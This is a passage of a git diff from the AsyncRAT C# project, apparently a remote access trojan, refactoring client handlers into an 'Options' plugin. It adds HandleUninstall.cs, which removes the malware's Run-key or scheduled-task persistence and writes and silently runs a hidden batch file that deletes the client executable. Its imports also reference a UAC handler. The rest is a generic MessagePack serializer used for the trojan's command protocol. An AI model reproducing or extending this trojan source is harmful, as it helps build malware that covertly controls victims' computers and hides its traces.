+ Connection.Disconnected();
+ }
+ }
+
+}
diff --git a/AsyncRAT-C#/Client/Handle Packet/HandleUAC.cs b/AsyncRAT-C#/Plugin/Options/Options/Handler/HandleUAC.cs
similarity index 84%
rename from AsyncRAT-C#/Client/Handle Packet/HandleUAC.cs
rename to AsyncRAT-C#/Plugin/Options/Options/Handler/HandleUAC.cs
index 8e8214a..3c48c07 100644
--- a/AsyncRAT-C#/Client/Handle Packet/HandleUAC.cs
+++ b/AsyncRAT-C#/Plugin/Options/Options/Handler/HandleUAC.cs
@@ -1,15 +1,10 @@
-using Client.Helper;
-using Microsoft.Win32;
-using System;
+using System;
using System.Collections.Generic;
using System.Diagnostics;
-using System.IO;
using System.Linq;
-using System.Security.Principal;
using System.Text;
-using System.Windows.Forms;
-namespace Client.Handle_Packet
+namespace Plugin.Handler
{
public class HandleUAC
{
@@ -37,4 +32,5 @@ namespace Client.Handle_Packet
catch { }
}
}
+
}
diff --git a/AsyncRAT-C#/Plugin/Options/Options/Handler/HandleUninstall.cs b/AsyncRAT-C#/Plugin/Options/Options/Handler/HandleUninstall.cs
new file mode 100644
index 0000000..2602919
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Options/Options/Handler/HandleUninstall.cs
@@ -0,0 +1,62 @@
+using Microsoft.Win32;
+using System;
+using System.Collections.Generic;
+using System.Diagnostics;
+using System.IO;
+using System.Linq;
+using System.Text;
+using System.Windows.Forms;
+
+namespace Plugin.Handler
+{
+ public class HandleUninstall
+ {
+ public HandleUninstall()
+ {
+ if (Convert.ToBoolean(Plugin.Install))
+ {
+ try
+ {
+ if (!Methods.IsAdmin())
+ Registry.CurrentUser.CreateSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Run", RegistryKeyPermissionCheck.ReadWriteSubTree).DeleteValue(Plugin.InstallFile);
+ else
+ {
+ Process.Start(new ProcessStartInfo()
+ {
+ FileName = "schtasks",
+ Arguments = "/delete /f /tn " + @"""'" + Plugin.InstallFile + @"""'",
+ CreateNoWindow = true,
+ ErrorDialog = false,
+ UseShellExecute = false,
+ WindowStyle = ProcessWindowStyle.Hidden
+ });
+ }
+ }
+ catch { }
+ }
+
+ string batch = Path.GetTempFileName() + ".bat";
+ using (StreamWriter sw = new StreamWriter(batch))
+ {
+ sw.WriteLine("@echo off");
+ sw.WriteLine("timeout 3 > NUL");
+ sw.WriteLine("CD " + Application.StartupPath);
+ sw.WriteLine("DEL " + "\"" + Path.GetFileName(Application.ExecutablePath) + "\"" + " /f /q");
+ sw.WriteLine("CD " + Path.GetTempPath());
+ sw.WriteLine("DEL " + "\"" + Path.GetFileName(batch) + "\"" + " /f /q");
+ }
+ Process.Start(new ProcessStartInfo()
+ {
+ FileName = batch,
+ CreateNoWindow = true,
+ ErrorDialog = false,
+ UseShellExecute = false,
+ WindowStyle = ProcessWindowStyle.Hidden
+ });
+
+ Methods.ClientExit();
+ Environment.Exit(0);
+ }
+ }
+
+}
diff --git a/AsyncRAT-C#/Plugin/Options/Options/MessagePack/BytesTools.cs b/AsyncRAT-C#/Plugin/Options/Options/MessagePack/BytesTools.cs
new file mode 100644
index 0000000..bd66e46
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Options/Options/MessagePack/BytesTools.cs
@@ -0,0 +1,102 @@
+using System;
+using System.Collections.Generic;
+using System.Linq;
+using System.Text;
+using System.Threading.Tasks;
+
+namespace Plugin.MessagePack
+{
+ public class BytesTools
+ {
+ static UTF8Encoding utf8Encode = new UTF8Encoding();
+
+ public static byte[] GetUtf8Bytes(String s)
+ {
+
+ return utf8Encode.GetBytes(s);
+ }
+
+ public static String GetString(byte[] utf8Bytes)
+ {
+ return utf8Encode.GetString(utf8Bytes);
+ }
+
+ public static String BytesAsString(byte[] bytes)
+ {
+ StringBuilder sb = new StringBuilder();
+ foreach (byte b in bytes)
+ {
+ sb.Append(String.Format("{0:D3} ", b));
+ }
+ return sb.ToString();
+ }
+
+
+ public static String BytesAsHexString(byte[] bytes)
+ {
+ StringBuilder sb = new StringBuilder();
+ foreach (byte b in bytes)
+ {
+ sb.Append(String.Format("{0:X2} ", b));
+ }
+ return sb.ToString();
+ }
+
+ ///
+ /// 交换byte数组数据
+ /// 可用于高低数据交换
+ ///
+ /// 要交换的byte数组
+ /// 返回交换后的数据
+ public static byte[] SwapBytes(byte[] v)
+ {
+ byte[] r = new byte[v.Length];
+ int j = v.Length - 1;
+ for (int i = 0; i < r.Length; i++)
+ {
+ r[i] = v[j];
+ j--;
+ }
+ return r;
+ }
+
+ public static byte[] SwapInt64(Int64 v)
+ {
+ //byte[] r = new byte[8];
+ //r[7] = (byte)v;
+ //r[6] = (byte)(v >> 8);
+ //r[5] = (byte)(v >> 16);
+ //r[4] = (byte)(v >> 24);
+ //r[3] = (byte)(v >> 32);
+ //r[2] = (byte)(v >> 40);
+ //r[1] = (byte)(v >> 48);
+ //r[0] = (byte)(v >> 56);
+ return SwapBytes(BitConverter.GetBytes(v));
+ }
+
+ public static byte[] SwapInt32(Int32 v)
+ {
+ byte[] r = new byte[4];
+ r[3] = (byte)v;
+ r[2] = (byte)(v >> 8);
+ r[1] = (byte)(v >> 16);
+ r[0] = (byte)(v >> 24);
+ return r;
+ }
+
+
+ public static byte[] SwapInt16(Int16 v)
+ {
+ byte[] r = new byte[2];
+ r[1] = (byte)v;
+ r[0] = (byte)(v >> 8);
+ return r;
+ }
+
+ public static byte[] SwapDouble(Double v)
+ {
+ return SwapBytes(BitConverter.GetBytes(v));
+ }
+
+ }
+}
\ No newline at end of file
diff --git a/AsyncRAT-C#/Plugin/Options/Options/MessagePack/MsgPack.cs b/AsyncRAT-C#/Plugin/Options/Options/MessagePack/MsgPack.cs
new file mode 100644
index 0000000..131eb37
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Options/Options/MessagePack/MsgPack.cs
@@ -0,0 +1,926 @@
+using System;
+using System.Collections;
+using System.Collections.Generic;
+using System.IO;
+using System.Linq;
+using System.Text;
+using System.Threading.Tasks;
+
+
+namespace Plugin.MessagePack
+{
+ public class MsgPackEnum : IEnumerator
+ {
+ List children;
+ int position = -1;
+
+ public MsgPackEnum(List obj)
+ {
+ children = obj;
+ }
+ object IEnumerator.Current
+ {
+ get { return children[position]; }
+ }
+
+ bool IEnumerator.MoveNext()
+ {
+ position++;
+ return (position < children.Count);
+ }
+
+ void IEnumerator.Reset()
+ {
+ position = -1;
+ }
+
+ }
+
+ public class MsgPackArray
+ {
+ List children;
+ MsgPack owner;
+
+ public MsgPackArray(MsgPack msgpackObj, List listObj)
+ {
+ owner = msgpackObj;
+ children = listObj;
+ }
+
+ public MsgPack Add()
+ {
+ return owner.AddArrayChild();
+ }
+
+ public MsgPack Add(String value)
+ {
+ MsgPack obj = owner.AddArrayChild();
+ obj.AsString = value;
+ return obj;
+ }
+
+ public MsgPack Add(Int64 value)
+ {
+ MsgPack obj = owner.AddArrayChild();
+ obj.SetAsInteger(value);
+ return obj;
+ }
+
+ public MsgPack Add(Double value)
+ {
+ MsgPack obj = owner.AddArrayChild();
+ obj.SetAsFloat(value);
+ return obj;
+ }
+
+ public MsgPack this[int index]
+ {
+ get { return children[index]; }
+ }
+
+ public int Length
+ {
+ get { return children.Count; }
+ }
+ }
+
+ public class MsgPack : IEnumerable
+ {
+ string name;
+ string lowerName;
+ object innerValue;
+ MsgPackType valueType;
+ MsgPack parent;
+ List children = new List();
+ MsgPackArray refAsArray = null;
+
+ private void SetName(string value)
+ {
+ this.name = value;
+ this.lowerName = name.ToLower();
+ }
+
+ private void Clear()
+ {
+ for (int i = 0; i < children.Count; i++)
+ {
+ ((MsgPack)children[i]).Clear();
+ }
+ children.Clear();
+ }
+
+ private MsgPack InnerAdd()
+ {
+ MsgPack r = new MsgPack();
+ r.parent = this;
+ this.children.Add(r);
+ return r;
+ }
+
+ private int IndexOf(string name)
+ {
+ int i = -1;
+ int r = -1;
+
+ string tmp = name.ToLower();
+ foreach (MsgPack item in children)
+ {
+ i++;
+ if (tmp.Equals(item.lowerName))
+ {
+ r = i;
+ break;
+ }
+ }
+ return r;
+ }
+
+ public MsgPack FindObject(string name)
+ {
+ int i = IndexOf(name);
+ if (i == -1)
+ {
+ return null;
+ }
+ else
+ {
+ return this.children[i];
+ }
+ }
+
+
+ private MsgPack InnerAddMapChild()
+ {
+ if (valueType != MsgPackType.Map)
+ {
+ Clear();
+ this.valueType = MsgPackType.Map;
+ }
+ return InnerAdd();
+ }
+
+ private MsgPack InnerAddArrayChild()
+ {
+ if (valueType != MsgPackType.Array)
+ {
+ Clear();
+ this.valueType = MsgPackType.Array;
+ }
+ return InnerAdd();
+ }
+
+ public MsgPack AddArrayChild()
+ {
+ return InnerAddArrayChild();
+ }
+
+ private void WriteMap(Stream ms)
+ {
+ byte b;
+ byte[] lenBytes;
+ int len = children.Count;
+ if (len <= 15)
+ {
+ b = (byte)(0x80 + (byte)len);
+ ms.WriteByte(b);
+ }
+ else if (len <= 65535)
+ {
+ b = 0xDE;
+ ms.WriteByte(b);
+
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int16)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+ else
+ {
+ b = 0xDF;
+ ms.WriteByte(b);
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int32)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+
+ for (int i = 0; i < len; i++)
+ {
+ WriteTools.WriteString(ms, children[i].name);
+ children[i].Encode2Stream(ms);
+ }
+ }
+
+ private void WirteArray(Stream ms)
+ {
+ byte b;
+ byte[] lenBytes;
+ int len = children.Count;
+ if (len <= 15)
+ {
+ b = (byte)(0x90 + (byte)len);
+ ms.WriteByte(b);
+ }
+ else if (len <= 65535)
+ {
+ b = 0xDC;
+ ms.WriteByte(b);
+
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int16)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+ else
+ {
+ b = 0xDD;
+ ms.WriteByte(b);
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int32)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+
+
+ for (int i = 0; i < len; i++)
+ {
+ ((MsgPack)children[i]).Encode2Stream(ms);
+ }
+ }
+
+ public void SetAsInteger(Int64 value)
+ {
+ this.innerValue = value;
+ this.valueType = MsgPackType.Integer;
+ }
+
+ public void SetAsUInt64(UInt64 value)
+ {
+ this.innerValue = value;
+ this.valueType = MsgPackType.UInt64;
+ }
+
+ public UInt64 GetAsUInt64()
+ {
+ switch (this.valueType)
+ {
+ case MsgPackType.Integer:
+ return Convert.ToUInt64((Int64)this.innerValue);
+ case MsgPackType.UInt64:
+ return (UInt64)this.innerValue;
+ case MsgPackType.String:
+ return UInt64.Parse(this.innerValue.ToString().Trim());
+ case MsgPackType.Float:
+ return Convert.ToUInt64((Double)this.innerValue);
+ case MsgPackType.Single:
+ return Convert.ToUInt64((Single)this.innerValue);
+ case MsgPackType.DateTime:
+ return Convert.ToUInt64((DateTime)this.innerValue);
+ default:
+ return 0;
+ }
+
+ }
+
+ public Int64 GetAsInteger()
+ {
+ switch (this.valueType)
+ {
+ case MsgPackType.Integer:
+ return (Int64)this.innerValue;
+ case MsgPackType.UInt64:
+ return Convert.ToInt64((Int64)this.innerValue);
+ case MsgPackType.String:
+ return Int64.Parse(this.innerValue.ToString().Trim());
+ case MsgPackType.Float:
+ return Convert.ToInt64((Double)this.innerValue);
+ case MsgPackType.Single:
+ return Convert.ToInt64((Single)this.innerValue);
+ case MsgPackType.DateTime:
+ return Convert.ToInt64((DateTime)this.innerValue);
+ default:
+ return 0;
+ }
+ }
+
+ public Double GetAsFloat()
+ {
+ switch (this.valueType)
+ {
+ case MsgPackType.Integer:
+ return Convert.ToDouble((Int64)this.innerValue);
+ case MsgPackType.String:
+ return Double.Parse((String)this.innerValue);
+ case MsgPackType.Float:
+ return (Double)this.innerValue;
+ case MsgPackType.Single:
+ return (Single)this.innerValue;
+ case MsgPackType.DateTime:
+ return Convert.ToInt64((DateTime)this.innerValue);
+ default:
+ return 0;
+ }
+ }
+
+
+ public void SetAsBytes(byte[] value)
+ {
+ this.innerValue = value;
+ this.valueType = MsgPackType.Binary;
+ }
+
+ public byte[] GetAsBytes()
+ {
+ switch (this.valueType)
+ {
+ case MsgPackType.Integer:
+ return BitConverter.GetBytes((Int64)this.innerValue);
+ case MsgPackType.String:
+ return BytesTools.GetUtf8Bytes(this.innerValue.ToString());
+ case MsgPackType.Float:
+ return BitConverter.GetBytes((Double)this.innerValue);
+ case MsgPackType.Single:
+ return BitConverter.GetBytes((Single)this.innerValue);
+ case MsgPackType.DateTime:
+ long dateval = ((DateTime)this.innerValue).ToBinary();
+ return BitConverter.GetBytes(dateval);
+ case MsgPackType.Binary:
+ return (byte[])this.innerValue;
+ default:
+ return new byte[] { };
+ }
+ }
+
+ public void Add(string key, String value)
+ {
+ MsgPack tmp = InnerAddArrayChild();
+ tmp.name = key;
+ tmp.SetAsString(value);
+ }
+
+ public void Add(string key, int value)
+ {
+ MsgPack tmp = InnerAddArrayChild();
+ tmp.name = key;
+ tmp.SetAsInteger(value);
+ }
+
+ public bool LoadFileAsBytes(string fileName)
+ {
+ if (File.Exists(fileName))
+ {
+ byte[] value = null;
+ FileStream fs = new FileStream(fileName, FileMode.Open, FileAccess.Read, FileShare.Read);
+ value = new byte[fs.Length];
+ fs.Read(value, 0, (int)fs.Length);
+ fs.Close();
+ fs.Dispose();
+ SetAsBytes(value);
+ return true;
+ }
+ else
+ {
+ return false;
+ }
+
+ }
+
+ public bool SaveBytesToFile(string fileName)
+ {
+ if (this.innerValue != null)
+ {
+ FileStream fs = new FileStream(fileName, FileMode.Append);
+ fs.Write(((byte[])this.innerValue), 0, ((byte[])this.innerValue).Length);
+ fs.Close();
+ fs.Dispose();
+ return true;
+ }
+ else
+ {
+ return false;
+ }
+ }
+
+ public MsgPack ForcePathObject(string path)
+ {
+ MsgPack tmpParent, tmpObject;
+ tmpParent = this;
+ string[] pathList = path.Trim().Split(new Char[] { '.', '/', '\\' });
+ string tmp = null;
+ if (pathList.Length == 0)
+ {
+ return null;
+ }
+ else if (pathList.Length > 1)
+ {
+ for (int i = 0; i < pathList.Length - 1; i++)
+ {
+ tmp = pathList[i];
+ tmpObject = tmpParent.FindObject(tmp);
+ if (tmpObject == null)
+ {
+ tmpParent = tmpParent.InnerAddMapChild();
+ tmpParent.SetName(tmp);
+ }
+ else
+ {
+ tmpParent = tmpObject;
+ }
+ }
+ }
+ tmp = pathList[pathList.Length - 1];
+ int j = tmpParent.IndexOf(tmp);
+ if (j > -1)
+ {
+ return tmpParent.children[j];
+ }
+ else
+ {
+ tmpParent = tmpParent.InnerAddMapChild();
+ tmpParent.SetName(tmp);
+ return tmpParent;
+ }
+ }
+
+ public void SetAsNull()
+ {
+ Clear();
+ this.innerValue = null;
+ this.valueType = MsgPackType.Null;
+ }
+
+ public void SetAsString(String value)
+ {
+ this.innerValue = value;
+ this.valueType = MsgPackType.String;
+ }
+
+ public String GetAsString()
+ {
+ if (this.innerValue == null)
+ {
+ return "";
+ }
+ else
+ {
+ return this.innerValue.ToString();
+ }
+
+ }
+
+ public void SetAsBoolean(Boolean bVal)
+ {
+ this.valueType = MsgPackType.Boolean;
+ this.innerValue = bVal;
+ }
+
+ public void SetAsSingle(Single fVal)
+ {
+ this.valueType = MsgPackType.Single;
+ this.innerValue = fVal;
+ }
+
+ public void SetAsFloat(Double fVal)
+ {
+ this.valueType = MsgPackType.Float;
+ this.innerValue = fVal;
+ }
+
+
+
+ public void DecodeFromBytes(byte[] bytes)
+ {
+ using (MemoryStream ms = new MemoryStream())
+ {
+ ms.Write(bytes, 0, bytes.Length);
+ ms.Position = 0;
+ DecodeFromStream(ms);
+ }
+ }
+
+ public void DecodeFromFile(string fileName)
+ {
+ FileStream fs = new FileStream(fileName, FileMode.Open);
+ DecodeFromStream(fs);
+ fs.Dispose();
+ }
+
+
+
+ public void DecodeFromStream(Stream ms)
+ {
+ byte lvByte = (byte)ms.ReadByte();
+ byte[] rawByte = null;
+ MsgPack msgPack = null;
+ int len = 0;
+ int i = 0;
+
+ if (lvByte <= 0x7F)
+ { //positive fixint 0xxxxxxx 0x00 - 0x7f
+ SetAsInteger(lvByte);
+ }
+ else if ((lvByte >= 0x80) && (lvByte <= 0x8F))
+ {
+ //fixmap 1000xxxx 0x80 - 0x8f
+ this.Clear();
+ this.valueType = MsgPackType.Map;
+ len = lvByte - 0x80;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.SetName(ReadTools.ReadString(ms));
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if ((lvByte >= 0x90) && (lvByte <= 0x9F)) //fixarray 1001xxxx 0x90 - 0x9f
+ {
+ //fixmap 1000xxxx 0x80 - 0x8f
+ this.Clear();
+ this.valueType = MsgPackType.Array;
+ len = lvByte - 0x90;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if ((lvByte >= 0xA0) && (lvByte <= 0xBF)) // fixstr 101xxxxx 0xa0 - 0xbf
+ {
+ len = lvByte - 0xA0;
+ SetAsString(ReadTools.ReadString(ms, len));
+ }
+ else if ((lvByte >= 0xE0) && (lvByte <= 0xFF))
+ { /// -1..-32
+ // negative fixnum stores 5-bit negative integer
+ // +--------+
+ // |111YYYYY|
+ // +--------+
+ SetAsInteger((sbyte)lvByte);
+ }
+ else if (lvByte == 0xC0)
+ {
+ SetAsNull();
+ }
+ else if (lvByte == 0xC1)
+ {
+ throw new Exception("(never used) type $c1");
+ }
+ else if (lvByte == 0xC2)
+ {
+ SetAsBoolean(false);
+ }
+ else if (lvByte == 0xC3)
+ {
+ SetAsBoolean(true);
+ }
+ else if (lvByte == 0xC4)
+ { // max 255
+ len = ms.ReadByte();
+ rawByte = new byte[len];
+ ms.Read(rawByte, 0, len);
+ SetAsBytes(rawByte);
+ }
+ else if (lvByte == 0xC5)
+ { // max 65535
+ rawByte = new byte[2];
+ ms.Read(rawByte, 0, 2);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToUInt16(rawByte, 0);
+
+ // read binary
+ rawByte = new byte[len];
+ ms.Read(rawByte, 0, len);
+ SetAsBytes(rawByte);
+ }
+ else if (lvByte == 0xC6)
+ { // binary max: 2^32-1
+ rawByte = new byte[4];
+ ms.Read(rawByte, 0, 4);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToInt32(rawByte, 0);
+
+ // read binary
+ rawByte = new byte[len];
+ ms.Read(rawByte, 0, len);
+ SetAsBytes(rawByte);
+ }
+ else if ((lvByte == 0xC7) || (lvByte == 0xC8) || (lvByte == 0xC9))
+ {
+ throw new Exception("(ext8,ext16,ex32) type $c7,$c8,$c9");
+ }
+ else if (lvByte == 0xCA)
+ { // float 32
+ rawByte = new byte[4];
+ ms.Read(rawByte, 0, 4);
+ rawByte = BytesTools.SwapBytes(rawByte);
+
+ SetAsSingle(BitConverter.ToSingle(rawByte, 0));
+ }
+ else if (lvByte == 0xCB)
+ { // float 64
+ rawByte = new byte[8];
+ ms.Read(rawByte, 0, 8);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsFloat(BitConverter.ToDouble(rawByte, 0));
+ }
+ else if (lvByte == 0xCC)
+ { // uint8
+ // uint 8 stores a 8-bit unsigned integer
+ // +--------+--------+
+ // | 0xcc |ZZZZZZZZ|
+ // +--------+--------+
+ lvByte = (byte)ms.ReadByte();
+ SetAsInteger(lvByte);
+ }
+ else if (lvByte == 0xCD)
+ { // uint16
+ // uint 16 stores a 16-bit big-endian unsigned integer
+ // +--------+--------+--------+
+ // | 0xcd |ZZZZZZZZ|ZZZZZZZZ|
+ // +--------+--------+--------+
+ rawByte = new byte[2];
+ ms.Read(rawByte, 0, 2);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsInteger(BitConverter.ToUInt16(rawByte, 0));
+ }
+ else if (lvByte == 0xCE)
+ {
+ // uint 32 stores a 32-bit big-endian unsigned integer
+ // +--------+--------+--------+--------+--------+
+ // | 0xce |ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ
+ // +--------+--------+--------+--------+--------+
+ rawByte = new byte[4];
+ ms.Read(rawByte, 0, 4);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsInteger(BitConverter.ToUInt32(rawByte, 0));
+ }
+ else if (lvByte == 0xCF)
+ {
+ // uint 64 stores a 64-bit big-endian unsigned integer
+ // +--------+--------+--------+--------+--------+--------+--------+--------+--------+
+ // | 0xcf |ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|
+ // +--------+--------+--------+--------+--------+--------+--------+--------+--------+
+ rawByte = new byte[8];
+ ms.Read(rawByte, 0, 8);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsUInt64(BitConverter.ToUInt64(rawByte, 0));
+ }
+ else if (lvByte == 0xDC)
+ {
+ // +--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ // | 0xdc |YYYYYYYY|YYYYYYYY| N objects |
+ // +--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ rawByte = new byte[2];
+ ms.Read(rawByte, 0, 2);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToInt16(rawByte, 0);
+
+ this.Clear();
+ this.valueType = MsgPackType.Array;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if (lvByte == 0xDD)
+ {
+ // +--------+--------+--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ // | 0xdd |ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ| N objects |
+ // +--------+--------+--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ rawByte = new byte[4];
+ ms.Read(rawByte, 0, 4);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToInt16(rawByte, 0);
+
+ this.Clear();
+ this.valueType = MsgPackType.Array;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if (lvByte == 0xD9)
+ {
+ // str 8 stores a byte array whose length is upto (2^8)-1 bytes:
+ // +--------+--------+========+
+ // | 0xd9 |YYYYYYYY| data |
+ // +--------+--------+========+
+ SetAsString(ReadTools.ReadString(lvByte, ms));
+ }
+ else if (lvByte == 0xDE)
+ {
+ // +--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ // | 0xde |YYYYYYYY|YYYYYYYY| N*2 objects |
+ // +--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ rawByte = new byte[2];
+ ms.Read(rawByte, 0, 2);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToInt16(rawByte, 0);
+
+ this.Clear();
+ this.valueType = MsgPackType.Map;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.SetName(ReadTools.ReadString(ms));
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if (lvByte == 0xDE)
+ {
+ // +--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ // | 0xde |YYYYYYYY|YYYYYYYY| N*2 objects |
+ // +--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ rawByte = new byte[2];
+ ms.Read(rawByte, 0, 2);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToInt16(rawByte, 0);
+
+ this.Clear();
+ this.valueType = MsgPackType.Map;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.SetName(ReadTools.ReadString(ms));
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if (lvByte == 0xDF)
+ {
+ // +--------+--------+--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ // | 0xdf |ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ| N*2 objects |
+ // +--------+--------+--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ rawByte = new byte[4];
+ ms.Read(rawByte, 0, 4);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToInt32(rawByte, 0);
+
+ this.Clear();
+ this.valueType = MsgPackType.Map;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.SetName(ReadTools.ReadString(ms));
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if (lvByte == 0xDA)
+ {
+ // str 16 stores a byte array whose length is upto (2^16)-1 bytes:
+ // +--------+--------+--------+========+
+ // | 0xda |ZZZZZZZZ|ZZZZZZZZ| data |
+ // +--------+--------+--------+========+
+ SetAsString(ReadTools.ReadString(lvByte, ms));
+ }
+ else if (lvByte == 0xDB)
+ {
+ // str 32 stores a byte array whose length is upto (2^32)-1 bytes:
+ // +--------+--------+--------+--------+--------+========+
+ // | 0xdb |AAAAAAAA|AAAAAAAA|AAAAAAAA|AAAAAAAA| data |
+ // +--------+--------+--------+--------+--------+========+
+ SetAsString(ReadTools.ReadString(lvByte, ms));
+ }
+ else if (lvByte == 0xD0)
+ {
+ // int 8 stores a 8-bit signed integer
+ // +--------+--------+
+ // | 0xd0 |ZZZZZZZZ|
+ // +--------+--------+
+ SetAsInteger((sbyte)ms.ReadByte());
+ }
+ else if (lvByte == 0xD1)
+ {
+ // int 16 stores a 16-bit big-endian signed integer
+ // +--------+--------+--------+
+ // | 0xd1 |ZZZZZZZZ|ZZZZZZZZ|
+ // +--------+--------+--------+
+ rawByte = new byte[2];
+ ms.Read(rawByte, 0, 2);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsInteger(BitConverter.ToInt16(rawByte, 0));
+ }
+ else if (lvByte == 0xD2)
+ {
+ // int 32 stores a 32-bit big-endian signed integer
+ // +--------+--------+--------+--------+--------+
+ // | 0xd2 |ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|
+ // +--------+--------+--------+--------+--------+
+ rawByte = new byte[4];
+ ms.Read(rawByte, 0, 4);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsInteger(BitConverter.ToInt32(rawByte, 0));
+ }
+ else if (lvByte == 0xD3)
+ {
+ // int 64 stores a 64-bit big-endian signed integer
+ // +--------+--------+--------+--------+--------+--------+--------+--------+--------+
+ // | 0xd3 |ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|
+ // +--------+--------+--------+--------+--------+--------+--------+--------+--------+
+ rawByte = new byte[8];
+ ms.Read(rawByte, 0, 8);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsInteger(BitConverter.ToInt64(rawByte, 0));
+ }
+ }
+
+ public byte[] Encode2Bytes()
+ {
+ using (MemoryStream ms = new MemoryStream())
+ {
+ Encode2Stream(ms);
+ byte[] r = new byte[ms.Length];
+ ms.Position = 0;
+ ms.Read(r, 0, (int)ms.Length);
+ return r;
+ }
+ }
+
+ public void Encode2Stream(Stream ms)
+ {
+ switch (this.valueType)
+ {
+ case MsgPackType.Unknown:
+ case MsgPackType.Null:
+ WriteTools.WriteNull(ms);
+ break;
+ case MsgPackType.String:
+ WriteTools.WriteString(ms, (String)this.innerValue);
+ break;
+ case MsgPackType.Integer:
+ WriteTools.WriteInteger(ms, (Int64)this.innerValue);
+ break;
+ case MsgPackType.UInt64:
+ WriteTools.WriteUInt64(ms, (UInt64)this.innerValue);
+ break;
+ case MsgPackType.Boolean:
+ WriteTools.WriteBoolean(ms, (Boolean)this.innerValue);
+ break;
+ case MsgPackType.Float:
+ WriteTools.WriteFloat(ms, (Double)this.innerValue);
+ break;
+ case MsgPackType.Single:
+ WriteTools.WriteFloat(ms, (Single)this.innerValue);
+ break;
+ case MsgPackType.DateTime:
+ WriteTools.WriteInteger(ms, GetAsInteger());
+ break;
+ case MsgPackType.Binary:
+ WriteTools.WriteBinary(ms, (byte[])this.innerValue);
+ break;
+ case MsgPackType.Map:
+ WriteMap(ms);
+ break;
+ case MsgPackType.Array:
+ WirteArray(ms);
+ break;
+ default:
+ WriteTools.WriteNull(ms);
+ break;
+ }
+ }
+
+ public String AsString
+ {
+ get
+ {
+ return GetAsString();
+ }
+ set
+ {
+ SetAsString(value);
+ }
+ }
+
+ public Int64 AsInteger
+ {
+ get { return GetAsInteger(); }
+ set { SetAsInteger((Int64)value); }
+ }
+
+ public Double AsFloat
+ {
+ get { return GetAsFloat(); }
+ set { SetAsFloat(value); }
+ }
+ public MsgPackArray AsArray
+ {
+ get
+ {
+ lock (this)
+ {
+ if (refAsArray == null)
+ {
+ refAsArray = new MsgPackArray(this, children);
+ }
+ }
+ return refAsArray;
+ }
+ }
+
+
+ public MsgPackType ValueType
+ {
+ get { return valueType; }
+ }
+
+
+ IEnumerator IEnumerable.GetEnumerator()
+ {
+ return new MsgPackEnum(children);
+ }
+ }
+}
\ No newline at end of file
diff --git a/AsyncRAT-C#/Plugin/Options/Options/MessagePack/MsgPackType.cs b/AsyncRAT-C#/Plugin/Options/Options/MessagePack/MsgPackType.cs
new file mode 100644
index 0000000..2567ae6
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Options/Options/MessagePack/MsgPackType.cs
@@ -0,0 +1,24 @@
+using System;
+using System.Collections.Generic;
+using System.Linq;
+using System.Text;
+using System.Threading.Tasks;
+
+namespace Plugin.MessagePack
